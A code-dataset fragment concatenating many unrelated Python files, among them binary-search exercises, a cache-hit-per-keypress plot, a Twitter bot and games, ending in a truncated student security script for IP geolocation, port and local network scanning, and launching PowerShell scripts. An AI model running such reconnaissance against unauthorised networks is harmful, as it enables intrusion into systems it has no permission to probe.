Solution(object):\n\tdef binarysearch_standard(self, array, target):\n\t\t# array = [10, 14, 19, 26, 27, 31, 33, 35, 42, 44]\n\t\t# target = 31\n\t\tleft, right = 0, len(array)-1\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2) \n\t\t\tif array[mid] == target:\n\t\t\t\treturn mid\n\t\t\telif array[mid] > target:\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t# https://leetcode.com/problems/sqrtx/\n\tdef mySqrt(self, x):\n\t\t\"\"\"\n\t\t:type x: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tif x==0 or x==1:\n\t\t\treturn x\n\t\tleft, right = 1, x\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2)\n\t\t\tif mid == int(x / mid):\n\t\t\t\treturn mid\n\t\t\telif mid > int(x / mid):\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t\t\t\tres = mid\n\t\treturn res\n\tdef mySqrt_newton(self, x):\n\t\tres = x\n\t\twhile res*res > x:\n\t\t\tres = int((res + x / res) / 2)\n\t\treturn res\n\tdef mySqrt_double(self, x, epision=1e-7):\n\t\tleft, right = 0, x\n\t\twhile abs(left-right) > epision:\n\t\t\tmid = (left+right) / 2\n\t\t\tif mid > x / mid:\n\t\t\t\tright = mid\n\t\t\telse:\n\t\t\t\tleft = mid\n\t\treturn left\n\t#https://leetcode.com/problems/valid-perfect-square/\n\tdef isPerfectSquare(self, num):\n\t\t\"\"\"\n\t\t:type num: int\n\t\t:rtype: bool\n\t\t\"\"\"\n\t\tleft, right = 0, num\n\t\twhile left <= right:\n\t\t\tmid = int((left + right) / 2)\n\t\t\tif mid * mid == num:\n\t\t\t\treturn True\n\t\t\telif mid * mid > num:\n\t\t\t\tright = mid - 1\n\t\t\telse:\n\t\t\t\tleft = mid + 1\n\t\treturn False\n\n\n\ns = Solution()\narray = [10, 14, 19, 26, 27, 31, 33, 35, 42, 44]\ntarget = 31\nres = s.binarysearch_standard(array, target)\nprint(\"res = \", res)\ntest_seq = [0, 1, 3, 8, 9, 20]\nres_seq = [s.mySqrt(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.mySqrt_newton(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.mySqrt_double(i) for i in test_seq]\nprint(\"res = \", res_seq)\nres_seq = [s.isPerfectSquare(i) for i in test_seq]\nprint(\"res = \", res_seq)\n\n\n","sub_path":"34_二分查找/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"378461754","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\n\nf = open('with_prftch.csv', 'r')\nmat1 = []\nfor lines in f:\n mat1.append(lines.split(','))\n\nf = open('no_prftch.csv', 'r')\nmat2 = []\nfor lines in f:\n mat2.append(lines.split(','))\n\nf = open('no_hw_prftch.csv', 'r')\nmat3 = []\nfor lines in f:\n mat3.append(lines.split(','))\n\naddrs = []\n\nfor row in mat1[1:]:\n addrs.append(row[0])\n\nkey = 0\n\nvalues1 = []\nvalues2 = []\nvalues3 = []\n\nfor row in mat1[1:]:\n values1.append(float(row[key+1]))\n\nfor row in mat2[1:]:\n values2.append(float(row[key+1]))\n\nfor row in mat3[1:]:\n values3.append(float(row[key+1]))\n\nplt.plot(range(1,3279), values1, 'r', label='With Prefetching')\nplt.plot(range(1,3279), values2, 'b', label='Without any Prefetching')\nplt.plot(range(1,3279), values3, 'g', label='Without Hardware Prefetching')\nplt.title('Comparison of data for key \"0\"')\nplt.xlabel('Addresses')\nplt.ylabel('Ratio: #cache_hits / #key_pressed')\n'''\nred_patch = mpatches.Patch(color='red', label='With Prefetching')\nblue_patch = mpatches.Patch(color='blue', label='Without any Prefetching')\ngreen_patch = mpatches.Patch(color='green', label='Without Hardware Prefetching')\nplt.legend(handles=[red_patch, blue_patch,green_patch])\n'''\n\nleg = plt.legend(loc='upper right', prop={'size':14})\n\nfor l in leg.get_lines():\n\tl.set_alpha(1)\n\tl.set_marker('.')\nplt.show()\n","sub_path":"profiling/linux_low_frequency_example/data_files/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"277246241","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport random\nfrom twython import Twython\n\nCONSUMER_KEY = 'TYPE_YOUR_CONSUMER_KEY_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nCONSUMER_SECRET = 'TYPE_YOUR_CONSUMER_SECRET_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nACCESS_KEY = 'TYPE_YOUR_ACCESS TOKEN_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\nACCESS_SECRET = 'TYPE_YOUR_ACCESS_TOKEN_SECRET_HERE_INSTEAD_OF_THIS_PLACEHOLDER_TEXT'\n\n__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\napi = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET) \n\ndef randomTweet():\n try:\n tweetsFile = open(os.path.join(__location__,'tweets.txt'),'r')\n tweetsList = tweetsFile.readlines()\n tweetsFile.close()\n randomChoice = random.randrange(len(tweetsList))\n print (tweetsList[randomChoice]) #For debugging only\n api.update_status(status=tweetsList[randomChoice])\n return None\n except IOError:\n return None \n\t\t\nrandomTweet()\n","sub_path":"twitterbot.py","file_name":"twitterbot.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"292328482","text":"from core.models import City\nfrom django import template\nfrom django.db.models import Q\nfrom support.models import Support\nfrom quicktag.template.quicktag import quicktag\n\nregister = template.Library()\n\n@register.tag\n@quicktag(takes_context=True)\ndef get_random_support(context,var_name='random_support'):\n support = Support.objects.all().order_by('?')\n context[var_name] = support.count() and support[0] or None\n return ''\n \n@register.tag\n@quicktag(takes_context=True)\ndef get_support(context,var_name='support_list',exclude_id=None):\n supports = Support.objects.all()\n if exclude_id:\n supports = supports.exclude(id=exclude_id)\n context[var_name] = supports\n return ''\n","sub_path":"ssemcarne/support/templatetags/support_tags.py","file_name":"support_tags.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"260532351","text":"import os\nimport gzip\nimport pickle\nimport numpy as np\nfrom PIL import Image\n\n\ndef pickle_pngs(directory, destination_path):\n memories = []\n file_names = [file_name for file_name in os.listdir(directory) if file_name.endswith('.png')]\n file_names.sort()\n for i, file_name in enumerate(file_names):\n if i % 1000 == 0:\n print('converted {} / {} images'.format(i, len(file_names)))\n img = Image.open(directory + file_name)\n img.load()\n array = np.asarray(img)\n memories.append({'image': array, 'sensor_angles': [0, 0, 0, 0]})\n with gzip.open(destination_path, 'wb') as destination_file:\n pickle.dump(memories, destination_file, 2)\n\n\ndef create_pngs(pkl_file_path, destination_dir):\n print('opening file...')\n with gzip.open(pkl_file_path) as src_file:\n print('loading images...')\n memories = pickle.load(src_file, encoding=\"bytes\")\n print('extracting {} images..'.format(len(memories)))\n for i, memory in enumerate(memories):\n if i % 100 == 0:\n print('extracted {} / {} images'.format(i, len(memories)))\n name = destination_dir + \"nao_img_\" + str(i).zfill(6) + \".png\"\n image = memory[b'image'][:, :, ::-1] # convert from BGR to RGB\n Image.fromarray(image).save(name)\n\n\ndef pickle_arrays(directory, destination_path):\n memories = []\n file_names = [file_name for file_name in os.listdir(directory) if file_name.endswith('.npy')]\n file_names.sort()\n for i, file_name in enumerate(file_names):\n if i % 1000 == 0:\n print('converted {} / {} images'.format(i, len(file_names)))\n array = np.load(directory + file_name)\n memories.append({'image': array, 'sensor_angles': [0, 0, 0, 0]})\n print('converted all {} images'.format(len(file_names)))\n print('dumping to pickle file...')\n with gzip.open(destination_path, 'wb') as destination_file:\n pickle.dump(memories, destination_file, 2)\n\n\nif __name__ == \"__main__\":\n # create_pngs(pkl_file_path=\"../data/nao_raw/agency_1b_original_19to35.pkl\",\n # destination_dir=\"../data/nao_raw/tmp/\")\n # pickle_pngs('../out/css_nao_flowintensity/', '../grey400_flow_intensity.pkl')\n pickle_arrays('../out/css_nao_fromscratch/', '../grey400_flow_fromscratch.pkl')\n","sub_path":"src/nao_img_util.py","file_name":"nao_img_util.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"34680350","text":"# https://github.com/vgenov-py/T-522/blob/master/pokemon.md\n\nimport random\nfrom funs import *\n\nelements = [\"fire\", \"grass\", \"water\"]\n# fire > grass\n# grass > water\n# water > fire\n# if > 1.5 // if < 0.5\n# fire grass water\n# Fire 1 1.5 0.5\n# GRass 0.5 1 1.5\n# water 1.5 0.5 1\n\nclass Pokemon:\n\n count = 0\n\n @classmethod\n def set_count(cls):\n cls.count += 1\n\n def __init__(self, name, element, HP):\n self.name = name\n self.element = element\n self.HP = HP\n self.attacks = []\n self.is_alive = True\n Pokemon.set_count()\n\n def __str__(self):\n if self.is_alive == True:\n return f\"name: {self.name}\\ntype: {self.element}\\nHP: {self.HP}\\nattacks: {self.attacks}\"\n else:\n return f\"El pokemon {self.name} fue derrotado...\"\n\n def learn(self, attack):\n return self.attacks.append(attack)\n\n def recive_damage(self, attack):\n damage = random.randint(0, attack.damage)\n print(attack.element)\n print(self.element)\n if self.element == attack.element:\n damage_final = damage\n self.HP -= damage_final\n else:\n if attack.element == \"fire\":\n if self.element == \"grass\":\n damage_final = damage *1.5\n self.HP -= damage_final\n elif self.element == \"water\":\n damage_final = damage *0.5\n self.HP -= damage_final\n elif attack.element == \"grass\":\n if self.element == \"water\":\n damage_final = damage *1.5\n self.HP -= damage_final\n elif self.element == \"fire\":\n damage_final = damage *0.5\n self.HP -= damage_final\n elif attack.element == \"water\":\n if self.element == \"fire\":\n damage_final = damage *1.5\n self.HP -= damage_final\n elif self.element == \"grass\":\n damage_final = damage *0.5\n self.HP -= damage_final\n print(f\"{self.name} recibe un daño de: {damage_final}\")\n if self.HP <= 0:\n self.is_alive = False\n\nclass Attack:\n def __init__(self, name, element, damage):\n self.name = name\n self.element = element\n self.damage = damage\n\n def __str__(self):\n return f\"{self.name}\"\n\n def __repr__(self):\n return f\"{self.name}: {self.damage}\"\n\n# elements = [\"fire\", \"grass\", \"water\"]\n# POKEMONS\ncharmander = Pokemon(\"Charmander\", elements[0], 120)\nsquirtle = Pokemon(\"Squirtle\", elements[2], 140)\nbulbasaur = Pokemon(\"Bulbasaur\", elements[1], 160)\nvulpix = Pokemon(\"Vulpix\", elements[0], 100)\ngolduck = Pokemon(\"Golduck\", elements[2], 150)\nmeganium = Pokemon(\"Meganium\", elements[1], 170)\n\n# ATTACKS\nflamethrower = Attack(\"Flamethrower\", elements[0], 40)\nrazor_leaf = Attack(\"Razor_leaf\", elements[1], 25)\nsurf = Attack(\"Surf\", elements[2], 35)\n\ncharmander.learn(flamethrower)\ncharmander.learn(razor_leaf)\nbulbasaur.learn(razor_leaf)\nbulbasaur.learn(surf)\nsquirtle.learn(surf)\nvulpix.learn(flamethrower)\ngolduck.learn(surf)\ngolduck.learn(razor_leaf)\nmeganium.learn(razor_leaf)\n\npokemons = [charmander, squirtle, bulbasaur, vulpix, golduck, meganium]\nprint(Pokemon.count)","sub_path":"pokemons.py","file_name":"pokemons.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"384949063","text":"from zoundry.appframework.ui.prefs.appprefsdialog import ZApplicationPreferencesPrefPage\r\nfrom zoundry.appframework.ui.widgets.dialogs.standarddialogs import ZShowInfoMessage\r\nfrom zoundry.blogapp.constants import IZUserPrefsDefaults\r\nfrom zoundry.blogapp.constants import IZBlogAppUserPrefsKeys\r\nfrom zoundry.blogapp.messages import _extstr\r\nimport wx\r\n\r\n# ------------------------------------------------------------------------------------\r\n# A user preference page impl for the General user prefs section.\r\n# ------------------------------------------------------------------------------------\r\nclass ZTrayPreferencePage(ZApplicationPreferencesPrefPage):\r\n\r\n def __init__(self, parent):\r\n ZApplicationPreferencesPrefPage.__init__(self, parent)\r\n # end __init__()\r\n\r\n def createWidgets(self):\r\n self.staticBox = wx.StaticBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.TrayIcon\")) #$NON-NLS-1$\r\n self.alwaysShowTrayIconCB = wx.CheckBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.AlwaysShowTrayIcon\")) #$NON-NLS-1$\r\n self.hideAppWindowCB = wx.CheckBox(self, wx.ID_ANY, _extstr(u\"trayprefpage.HideAppWindowOnMinimize\")) #$NON-NLS-1$\r\n # end createWidgets()\r\n\r\n def bindWidgetEvents(self):\r\n self.Bind(wx.EVT_CHECKBOX, self.onAlwaysShowCB, self.alwaysShowTrayIconCB)\r\n self.Bind(wx.EVT_CHECKBOX, self.onHideWhenMinCB, self.hideAppWindowCB)\r\n # end bindWidgetEvents()\r\n\r\n def populateWidgets(self):\r\n isAlwaysShow = self.session.getUserPreferenceBool(IZBlogAppUserPrefsKeys.SYSTRAY_ALWAYS_SHOW, IZUserPrefsDefaults.SYSTRAY_ALWAYS_SHOW)\r\n isHideWhenMin = self.session.getUserPreferenceBool(IZBlogAppUserPrefsKeys.SYSTRAY_HIDE_WHEN_MINIMIZED, IZUserPrefsDefaults.SYSTRAY_HIDE_WHEN_MINIMIZED)\r\n\r\n self.alwaysShowTrayIconCB.SetValue(isAlwaysShow)\r\n self.hideAppWindowCB.SetValue(isHideWhenMin)\r\n # end populateWidgets()\r\n\r\n def layoutWidgets(self):\r\n boxSizer = wx.StaticBoxSizer(self.staticBox, wx.VERTICAL)\r\n boxSizer.Add(self.alwaysShowTrayIconCB, 0, wx.EXPAND | wx.ALL, 3)\r\n boxSizer.Add(self.hideAppWindowCB, 0, wx.EXPAND | wx.ALL, 3)\r\n\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.AddSizer(boxSizer, 0, wx.EXPAND | wx.ALL, 5)\r\n self.SetAutoLayout(True)\r\n self.SetSizer(sizer)\r\n self.Layout()\r\n # end layoutWidgets()\r\n\r\n def onAlwaysShowCB(self, event):\r\n isAlwaysShow = self.alwaysShowTrayIconCB.GetValue()\r\n self.session.setUserPreference(IZBlogAppUserPrefsKeys.SYSTRAY_ALWAYS_SHOW, isAlwaysShow)\r\n event.Skip()\r\n # end onAlwaysShowCB()\r\n\r\n def onHideWhenMinCB(self, event):\r\n isHideApp = self.hideAppWindowCB.GetValue()\r\n self.session.setUserPreference(IZBlogAppUserPrefsKeys.SYSTRAY_HIDE_WHEN_MINIMIZED, isHideApp)\r\n event.Skip()\r\n # end onHideWhenMinCB()\r\n\r\n def apply(self):\r\n ZShowInfoMessage(self, _extstr(u\"trayprefpage.RequiredRestartMessage\"), _extstr(u\"trayprefpage.RequiredRestartTitle\")) #$NON-NLS-2$ #$NON-NLS-1$\r\n return ZApplicationPreferencesPrefPage.apply(self)\r\n # end apply()\r\n\r\n# end ZTrayPreferencePage\r\n","sub_path":"src/python/zoundry/blogapp/ui/prefs/prefpages/trayprefpage.py","file_name":"trayprefpage.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"611543909","text":"\"\"\"\r\nInteligência Artificial Aplicada (PUC/PR)\r\nDisciplina: Raciocínio Algorítmico\r\nPriscilla Bomfim Domingues\r\n\"\"\"\r\n\r\n# (a) implementar um algoritmo que crie uma matriz utilizando listas (lista de listas) com dimensões 3 x 3.\r\n# O programa deve inserir na matriz apenas valores zeros (0) e uns (1). A diagonal dessa matriz deve ser preenchida\r\n# com o valor um (1) e o restante com o valor zero (0). O programa deve também imprimir a matriz depois de sua criação.\r\n# E.g.: [ [ 1, 0, 0 ],\r\n# [ 0, 1, 0 ],\r\n# [ 0, 0, 1 ] ]\r\n\r\nm = []\r\ni = 0\r\n\r\nfor x in range(3):\r\n m.append([0]*3)\r\n m[i][i] = 1\r\n i += 1\r\n\r\nprint(m)\r\n\r\nprint()\r\n# b) implementar o mesmo algoritmo para criar uma matriz 3 x 3 utilizando a estrutura de dicionário.\r\n# E.g.: { 0: { 0: 1, 1: 0, 2: 0 },\r\n# 1: { 0: 0, 1: 1, 2: 0 },\r\n# 2: { 0: 0, 1: 0, 2: 1 }}\r\n\r\n\r\nm2 = {}\r\n\r\nfor x in range(3):\r\n m2[x] = {}\r\n for y in range(3):\r\n if x == y:\r\n m2[x][y] = 1\r\n else:\r\n m2[x][y] = 0\r\nprint(m2)\r\n","sub_path":"matrizes.py","file_name":"matrizes.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"648487566","text":"#Leetcode : Pass\n# TC- O(n), SC-O(n)...considering the new candies array created\n# 1) initialize candies array of size of ratings with 1 as each child must have atleast 1candy\n# 2) iterate from left to satisfy \"Children with a higher rating get more candies than their neighbors\"\n# and add +1\n# 3) similar to 2 iterate from right to check and update to satisfy condition\n\nclass Solution:\n def candy(self, ratings: List[int]) -> int:\n #1\n candies = [1]*len(ratings)\n #2\n for i in range(1,len(ratings)):\n if ratings[i]>ratings[i-1]: candies[i] = candies[i-1]+1\n #3\n for i in range((len(ratings)-2),-1,-1):\n if ratings[i]>ratings[i+1]: candies[i] =max(candies[i],candies[i+1]+1)\n return sum(candies)\n","sub_path":"candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"136981744","text":"\nimport discord,json,datetime\nfrom discord.ext import commands\n\nclass helpcommand(commands.DefaultHelpCommand):\n def __init__(self):\n super().__init__()\n self.commands_heading = \"コマンド:\"\n self.no_category = \"その他\"\n self.command_attrs[\"help\"] = \"へるぷ\"\n\n def get_ending_note(self):\n return (\"Github:https://github.com/iemike3/jinroubot\")\n\nbot = commands.Bot(command_prefix=\"j.\",help_command=helpcommand())\n\nwith open(\"config.json\",\"r\") as f:\n config = json.load(f)\n\n@bot.event\nasync def on_ready():\n print(\"---------------------\")\n print(f\"User:{bot.user}\")\n print(f\"Login Time:{datetime.datetime.now()}\")\n print(\"---------------------\")\n\nclass WereWolf_Main(commands.Cog,name=\"人狼コマンド\"):\n def __init__(self, bot):\n super().__init__()\n self.bot = bot\n\n @commands.command()\n async def start(self,ctx):\n await ctx.send(\"start command run\")\n\n @commands.command()\n async def stop(self,ctx):\n await ctx.send(\"stop command end\")\n\nbot.add_cog(WereWolf_Main(bot=bot))\nbot.run(config[\"token\"])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"554051402","text":"import matplotlib.pyplot as plt\nimport sys\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n# Range for RDD is 1 - 5 (0.2 - 1.0)\n# Collect for each size, for each algorithm the result\nf = open('WorkLoad.csv', 'r')\n\n# Read all lines, saving in an array\ndata = f.readlines()\n\n# Initialize the result array, and a separate array to count the amount of instances.\n\n\n#\nresult = {}\nfor i in range(0, 5):\n for j in range(0, 5):\n result[i, j] = 0\n # print(i, j)\n\n# arr = [[] for i in range(5)]\narr = []\ncolumn = 5\nfor j in range(1, column):\n arr.append([])\n\ni = 0\n# Loop through all the data\n\nfor entry in data:\n # print(\"i= \", i)\n if (len(entry) > 1):\n entry_data = entry[1:len(entry) - 1].split(\",\")\n # print(entry_data)\n\n # for j in range(0,len(entry_data)) :\n # result[i, j] = int(entry_data[j])\n # print(result[i, j])\n\n count = 0\n flag = sys.maxsize\n\n\n for ele in entry_data:\n #\n # print(\"ele= \", ele)\n arr[count].append(int(ele))\n # print(arr[count][i])\n count += 1\n\n while count < 4:\n arr[count].append(0)\n count += 1\n\n i += 1\n\nprint(arr[0])\n\nx = list(range(0, len(arr[0])))\n\n# print(x)\n\nflag=0\nfor ele in arr[2]:\n if ele != 0:\n break\n flag+=1\n\nflag2=2\nfor ele in arr[3]:\n if ele != 0:\n break\n flag2+=1\nax = plt.gca()\nax.tick_params(axis='x', which='major', labelsize=35)\nax.tick_params(axis='y', which='major', labelsize=35)\n\nplt.plot((flag-1, flag-1), (0, 180), '--')\nplt.plot((flag2-1, flag2-1), (0, 180), '--')\n\nplt.plot(x, arr[0],label='Node 1')\nplt.plot(x, arr[1],label='Node 2')\nplt.plot(x, arr[2],label='Node 3')\nplt.plot(x, arr[3],label='Node 4')\n\nplt.title('Auto Scaling Up',size=35)\nplt.xlabel('Time',size=35)\nplt.ylabel('Number of Tasks on Each Node',size=35)\nplt.legend(bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.,prop={'size':25})\n\nplt.show()\n","sub_path":"pythondraw/cloudComputingGraph.py","file_name":"cloudComputingGraph.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"489131945","text":"## begin license ##\n#\n# \"Gustos-Meresco\" is a set of Gustos components for Meresco based projects.\n#\n# Copyright (C) 2014-2015, 2021 Seecr (Seek You Too B.V.) https://seecr.nl\n# Copyright (C) 2014-2015, 2021 Stichting Kennisnet https://www.kennisnet.nl\n# Copyright (C) 2021 Data Archiving and Network Services https://dans.knaw.nl\n# Copyright (C) 2021 SURF https://www.surf.nl\n# Copyright (C) 2021 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl\n#\n# This file is part of \"Gustos-Meresco\"\n#\n# \"Gustos-Meresco\" is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# \"Gustos-Meresco\" is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with \"Gustos-Meresco\"; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n## end license ##\n\nfrom meresco.core import Transparent\nfrom meresco.components.log import collectLog\n\nclass ClauseLog(Transparent):\n def executeQuery(self, query, **kwargs):\n clauses = 0\n for expr in query.iter():\n if not expr.operator:\n clauses += 1\n collectLog(dict(cqlClauses=clauses))\n response = yield self.any.executeQuery(query=query, **kwargs)\n return response\n\n","sub_path":"gustos/meresco/clauselog.py","file_name":"clauselog.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"134419465","text":"# Node class\nclass Node:\n # Function to initialize the node object\n def __init__(self, value):\n self.val = value # Assign value\n self.next = None # Initialize next as null\n\n\n# Linked List class\nclass SingleListNode:\n # Function to initialize the Linked List\n def __init__(self):\n self.head = None\n\n # Function to traverse until it reaches the most end of the linked lists\n # @return last Node\n def traverse(self):\n if self.head == None:\n return None\n\n if self.head.next == None:\n return self.head\n\n temp = self.head\n while(temp.next!=None):\n temp = temp.next\n\n return temp\n\n # Function to insert at the last Node\n def insertLast(self, value):\n lastNode = self.traverse()\n\n target = Node(value)\n if lastNode != None:\n lastNode.next = target\n\n return target\n\n # Function to insert at the begining (before head)\n def insert(self, value):\n firstNode = Node(value)\n firstNode.next = self.head\n self.head = firstNode\n\n return self.head\n\n # Function to find a Node with value, then return the reference to that Node\n # @return : previous, target\n def search(self, value):\n # If linked lists empty, return None\n if self.head == None:\n return None, None\n\n # If head contains the value\n if self.head.val == value:\n return None, self.head\n\n # Try to find the Node\n temp = self.head\n while temp.next != None:\n if temp.next.val == value:\n return temp, temp.next\n temp = temp.next\n\n # No such Node in the linked list\n return None, None\n\n # Function to delete a Node with value, then return the reference of that Node\n # @return deleted Node\n def delete(self, value):\n # If linked list is empty\n if self.head == None:\n return None;\n # If head is the target\n if self.head.val == value:\n target = self.head\n self.head = self.head.next\n return target\n\n # Iterate through linked list to find target Node\n prev, target = self.search(value)\n\n # If found target, delete\n if target != None:\n prev.next = target.next\n return target\n\n # If not found, delete\n return None\n\n","sub_path":"python/ds/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"621379162","text":"\"\"\"\n爬取铅笔网的小说\n\"\"\"\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\ndef get_page_content(content=None):\n global title, file\n if content is None:\n content = []\n html = driver.page_source\n soup = BeautifulSoup(html, 'lxml')\n\n if title is None:\n title = soup.select('#mlfy_main_text h1')[0].string\n file.write(title)\n\n read_content = soup.find_all(class_='read-content')\n [s.extract() for s in read_content[0].findAll('dt')]\n [s.extract() for s in read_content[0].findAll('center')]\n content.extend(list(read_content[0].strings))\n\n if soup.select('.mlfy_page a')[4].string == '下一章':\n print(title)\n for i in content:\n file.write(i)\n driver.find_element_by_link_text(u'下一章').click()\n title = None\n get_page_content()\n\n elif soup.select('.mlfy_page a')[4].string == '下一页':\n driver.find_element_by_link_text(u'下一页').click()\n get_page_content(content)\n\n elif soup.select('.mlfy_page a')[4].string == '末章节':\n for i in content:\n file.write(i)\n\n\noption = Options()\noption.add_argument('--headless')\noption.add_argument('--disable-gpu')\ndriver = webdriver.Chrome(\n executable_path=r'C:\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\Application\\chromedriver.exe',\n options=option)\ndriver.get('https://www.x23qb.com/book/8311/54153260.html')\ntitle = None\nfile = open('第五卷.txt', 'w+', encoding='utf-8')\nget_page_content()\nfile.close()\ndriver.quit()\n","sub_path":"2019年5月12日/pencil.py","file_name":"pencil.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651524895","text":"from importa import *\n\n#Espacio de colaboracion de juan daniel\n\n\ndef encrypt():\n hora = ño()\n try:\n comando = \"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/PIA/CiberTools/26-10-2021/base64.ps1\"\n subprocess.call([\"C://WINDOWS//system32//WindowsPowerShell//v1.0//powershell.exe\",'./base64.ps1'])\n logging.info(hora[0:19]+\" Se ejecuto Encrypt correctamente \")\n except:\n logging.error( hora[0:19] + \" Fallo Encrypt \")\n \n\ndef paiton():\n hora = ño()\n try:\n python = \"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/PIA/CiberTools/26-10-2021/APIhunter.py\"\n subprocess.call([\"python\",'./APIhunter.py'])\n logging.info(hora[0:19]+\" Se ejecuto APIHUNTER correctamente \")\n except:\n logging.error(hora[0:19]+\" Fallo APIHUNTER \") \n\n# Funcion para la barra de progreso\n\n\ndef ño():\n hora=str(datetime.datetime.now())\n return hora\n\n\ndef barra():\n bar2 = ChargingBar('Obteniendo Datos:', max=100)\n for num in range(100):\n time.sleep(random.uniform(0, 0.1))\n bar2.next()\n bar2.finish()\n\n\n# Argumentos \n\n\ndef argumentos():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ip\", dest=\"ip_public\",\n help=\"Ingresa la ip, si no pones\" +\n \"nada se tomará automatico 8.8.4.4\")\n parser.add_argument(\"-i\", dest=\"ip_local\", help=\"Ingresa la ip\")\n parser.add_argument(\"-user\", dest=\"user_name\",\n help=\"Ingresa un username para el envio del correo \")\n parser.add_argument(\"-pts\", dest=\"puerto\",default='20-100',\n help=\"Ingresa los puertos a escanear ejemplo --> 80-90 \")\n parser.add_argument(\"-m\", dest=\"msg\",\n help=\"Ingresa el mensaje a enviar \")\n parser.add_argument(\"-dest\", dest=\"numero\",\n help=\"Ingresa el numero a dodne enviaras el mensaje \")\n mensaje = parser.parse_args()\n numero = parser.parse_args()\n puertos = parser.parse_args()\n ip_public = parser.parse_args()\n ip_local = parser.parse_args()\n user = parser.parse_args()\n return ip_local, ip_public, user, puertos, mensaje, numero\n\n\n# Funcion para hacer la llamada a la API de Geolocalizacion\n\n\ndef geolocalizacion(ip_public):\n hora = ño()\n url = \"http://free.ipwhois.io/json/{}\".format(ip_public.ip_public)\n barra()\n soup = requests.get(url)\n data = soup.text\n data = soup.json()\n datos = open(\"datos.txt\", \"w\")\n n = 1\n q = 0\n r = 0\n valor = []\n valor2 = []\n wb = openpyxl.Workbook()\n ws = wb.active\n Columna1 = ['A' + str(n)]\n for key in data:\n # que lo escriba en txt\n datos.write(key + \": \" + str(data[key]) + \"\\n\")\n # para guardar el excel\n valor.append(str(key))\n ws.cell(row=r + 1, column=1).value = str(valor[q])\n valor2.append(str(data[key]))\n ws.cell(row=r+1, column=2).value = str(valor2[q])\n n = n + 1\n q = q + 1\n r = r + 1\n wb.save('datoss.xlsx')\n datos.close()\n print(\"Archivo con datos de Geolocalizacion generado con exito \")\n logging.info(hora[0:19]+\" Ejecucion de funcion geolocalizacion correctamente\")\n \n\n\n# Funcion para scanear las ip activas en una red local\n\n\ndef scan(ip_local):\n hora = ño()\n try:\n # Usamos argparser para pasar los argumentos por terminal\n archivo = 